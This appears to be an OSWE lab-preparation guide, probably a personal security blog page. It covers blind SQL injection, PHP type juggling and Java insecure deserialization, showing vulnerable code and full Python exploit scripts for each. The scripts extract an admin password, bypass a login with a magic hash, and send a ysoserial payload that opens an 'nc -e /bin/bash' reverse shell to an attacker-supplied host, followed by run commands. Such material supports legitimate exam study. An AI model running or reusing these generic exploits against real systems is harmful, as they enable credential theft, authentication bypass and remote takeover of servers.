OSWE Lab Preparation

[ SYSTEM READY ] [ INITIATING PROTOCOL ]

This guide covers the white-box analysis and exploitation of three distinct vulnerability classes found in the provided labs: Blind SQL Injection, PHP Type Juggling, and Java Insecure Deserialization.

1. Environment Setup

The labs are containerized for easy deployment. You will need Docker installed to run these.

Pull and Run the Global Docker Images:

2. Vulnerability Analysis & Full Exploit Code

A. Blind SQL Injection (Boolean-Based)

The Vulnerability:
The application constructs a SQL query by sticking user input directly into the command without safety checks.

Vulnerable Code (White Box):

$id = $_GET['id'];
$query = "SELECT * FROM courses WHERE id = " . $id; 
// If query returns data, show "OSWE Course Guide". If not, show nothing.
if ($result->num_rows > 0) { echo "OSWE Course Guide"; }

Full Exploit Code (sqli_poc.py):

import requests
import sys
import string

def exploit(target):
    url = target
    print(f"[+] {url} is our target")
    
    # Phase 1: Find Password Length
    for i in range(1, 50):
        payload = f"1 AND LENGTH((SELECT password FROM users WHERE username='admin'))={i}"
        params = {'id': payload}
        response = requests.get(url, params=params)
        
        if "OSWE Course Guide" in response.text:
            print(f"[+] Length of the password is {i}")
            break

    # Phase 2: Brute Force Characters
    charset = string.ascii_letters + string.digits + "{}_-@!?"
    password = ""
    
    for j in range(1, i + 1):
        for c in charset:
            # Check specific character ASCII value
            payload = f"1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),{j},1)) = {ord(c)}"
            params = {'id': payload}
            response = requests.get(url, params=params)
            
            if "OSWE Course Guide" in response.text:
                password += c
                sys.stdout.write(f"{c}")
                sys.stdout.flush()
                break # Move to next character

    print('')
    print(f"[+] Password is {password}")
    print("[!] Done :)")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"[+] Usage python3 {sys.argv[0]} http://localhost/index.php")
        sys.exit(1)
    url = sys.argv[1]
    exploit(url)

B. PHP Type Juggling (Authentication Bypass)

The Vulnerability:
PHP's loose comparison operator (`==`) treats strings starting with `0e` followed by numbers as scientific notation (0). This allows bypassing authentication with "Magic Hashes".

Vulnerable Code (White Box):

$hash = md5($password);
// VULNERABLE: Uses '==' (loose) instead of '===' (strict)
if ($hash == "0e123456789...") { echo "Authentication Bypassed"; }

Full Exploit Code (juggling_poc.py):

import requests
import sys

def php_magic_hashes():
    print("[+] Returning php magic hashes whose md5 evaluate to 0")
    # "aabg7XSs" md5 hash starts with 0e...
    return "aabg7XSs"

def exploit(target):
    payload = php_magic_hashes()
    data = {
        "username": "admin",
        "password": payload,
        "login": "Login+%28Vulnerable%29"
    }
    url = target
    
    try:
        response = requests.post(url, data=data, timeout=5)
    except Exception as e:
        print("[-] Request failed.", e)
        return

    if "authentication bypassed" in response.text.lower():
        print("[+] Succesfully conducted php type juggling")
        print("="*100)
        print("[+] Response content snippet:", response.content[:100])
    else:
        print("[-] Not successfull")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"[+] Usage python3 {sys.argv[0]} http://target.com/login.php")
        sys.exit(-1)
    target = sys.argv[1]
    exploit(target)

C. Java Insecure Deserialization

The Vulnerability:
The application blindly deserializes Java objects. This allows an attacker to provide a malicious object that triggers code execution upon reading.

Vulnerable Code (White Box):

// Reads raw bytes from the request and converts them into a Java Object
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject(); // CODE EXECUTION HAPPENS HERE

Full Exploit Code (deser_poc.py):

import requests, subprocess, sys, os, base64

if len(sys.argv) < 4:
    print(f"Usage: {sys.argv[0]} <URL> <LHOST> <LPORT>")
    print(f"Example: {sys.argv[0]} http://victim:8080/api 10.0.0.1 4444")
    sys.exit(1)

TARGET_URL = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]

print("[*] Java Deserialization Exploit")
print(f"[*] Target: {TARGET_URL}")
print(f"[*] LHOST: {LHOST}, LPORT: {LPORT}")

shell = f"nc -e /bin/bash {LHOST} {LPORT}"
COMMAND = shell

print("[*] Generating payload...")
try:
    if not os.path.exists("ysoserial.jar"):
        print("[!] Download ysoserial.jar first!")
        sys.exit(1)
    
    # Generate payload using CommonsCollections5 gadget chain
    cmd = ["java", "-jar", "ysoserial.jar", "CommonsCollections5", COMMAND]
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    payload, error = process.communicate()
    
    if process.returncode != 0:
        print(f"[!] Failed: {error.decode()[:50]}")
        sys.exit(1)
    
    print(f"[+] Payload: {len(payload)} bytes")
    
    # Send it
    print("[*] Sending exploit...")
    r = requests.post(TARGET_URL, data=payload, 
                     headers={"Content-Type": "application/octet-stream"}, 
                     timeout=10)
    
    print(f"[+] Status: {r.status_code}")
    if r.status_code == 200:
        print("[!] 200 OK - Check your netcat listener!")
    else:
        print(f"[?] Got {r.status_code} - try other gadget chains")
        
except Exception as e:
    print(f"[!] Error: {e}")

3. How to Run the Exploits

Prerequisite: For the Java exploit, ensure you have ysoserial.jar inside the directory where you run the script.

1. Run SQL Injection:

python3 sqli_poc.py http://localhost:8083/index.php

2. Run PHP Type Juggling:

python3 juggling_poc.py http://localhost:8082/login.php

3. Run Java Deserialization:

First, start a listener in a separate terminal:

nc -lvnp 4444

Then run the exploit:

python3 deser_poc.py http://localhost:8080/api <YOUR_IP> 4444

4. Expected Results

docker images docker instances

SQL Injection Output:

blind sqli

Type Juggling Output:

type juggling

Deserialization Output:

deserialize java rce

5. Connect & Explore

Reach out for collaborations or check out my other security research.

aru510704@gmail.com LinkedIn Profile HTB Writeups